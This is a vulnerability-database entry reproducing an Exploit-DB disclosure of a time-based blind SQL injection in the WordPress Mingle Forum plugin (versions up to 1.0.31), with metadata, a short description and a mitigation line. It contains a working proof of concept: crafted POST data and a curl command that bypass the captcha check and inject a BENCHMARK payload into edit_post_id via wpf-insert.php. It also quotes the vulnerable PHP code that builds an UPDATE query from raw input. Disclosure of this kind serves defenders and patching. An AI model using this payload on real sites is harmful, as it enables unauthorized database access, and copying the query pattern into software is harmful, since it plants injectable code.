WordPress Mingle Forum plugin

vendor:

Mingle Forum plugin

by:

Miroslav Stampar

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Mingle Forum plugin

Affected Version From: 1.0.0

Affected Version To: 1.0.31

Patch Exists: NO

Related CWE:

CPE: a:wordpress:mingle_forum:1.0.31

Metasploit:

Other Scripts:

Platforms Tested: WordPress

2011

WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability

This vulnerability allows an attacker to inject SQL queries into the WordPress Mingle Forum plugin version 1.0.31. By manipulating the POST data, an attacker can execute arbitrary SQL queries, potentially leading to unauthorized access or data leakage.

Mitigation:

Upgrade to a newer version of the Mingle Forum plugin that has fixed the SQL injection vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability
# Date: 2011-09-19
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.31.zip
# Version: 1.0.31 (tested)
# Note: wpf_str_encrypt($_POST['wpf_security_code']) == $_POST['wpf_security_check']

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php
 wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

e.g.
curl --data "wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php

---------------
Vulnerable code
---------------
    if (!isset($_POST['edit_post_submit'])) {
        $errormsg = apply_filters('wpwf_check_guestinfo',"");
        if ($errormsg != "") {
            $error = true;
            wp_die($errormsg);
        }
    }

    if($options['forum_captcha'] == true && !$user_ID){
        include_once(WPFPATH."captcha/shared.php");
        $wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt("MhWNow==") == "fail"
            if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) {
              // do nothing
            }
            else {
                $error = true;
                $msg = __("Security code does not match", "mingleforum");
                wp_die($msg);
            }
    }

    ...

    if(isset($_POST['edit_post_submit'])){
        $myReplaceSub = array("'", "\\");
        $subject = str_replace($myReplaceSub, "", $mingleforum->input_filter($_POST['edit_post_subject']));
        $content = $mingleforum->input_filter($_POST['message']);
        $thread = $mingleforum->check_parms($_POST['thread_id']);
        $edit_post_id = $_POST['edit_post_id'];

        if($subject == ""){
            $msg .= "<h2>".__("An error occured", "mingleforum")."</h2>";
            $msg .= ("<div id='error'><p>".__("You must enter a subject", "mingleforum")."</p></div>");
            $error = true;
        }
        elseif($content == ""){
            $msg .= "<h2>".__("An error occured", "mingleforum")."</h2>";
            $msg .= ("<div id='error'><p>".__("You must enter a message", "mingleforum")."</p></div>");
            $error = true;
        }

        if ($error) wp_die($msg);

        //SECURITY FIX NEEDED <-- actual author's comment :)
        $sql = ("UPDATE $mingleforum->t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id");
        $wpdb->query($wpdb->prepare($sql)); // misusage of prepare statement(s)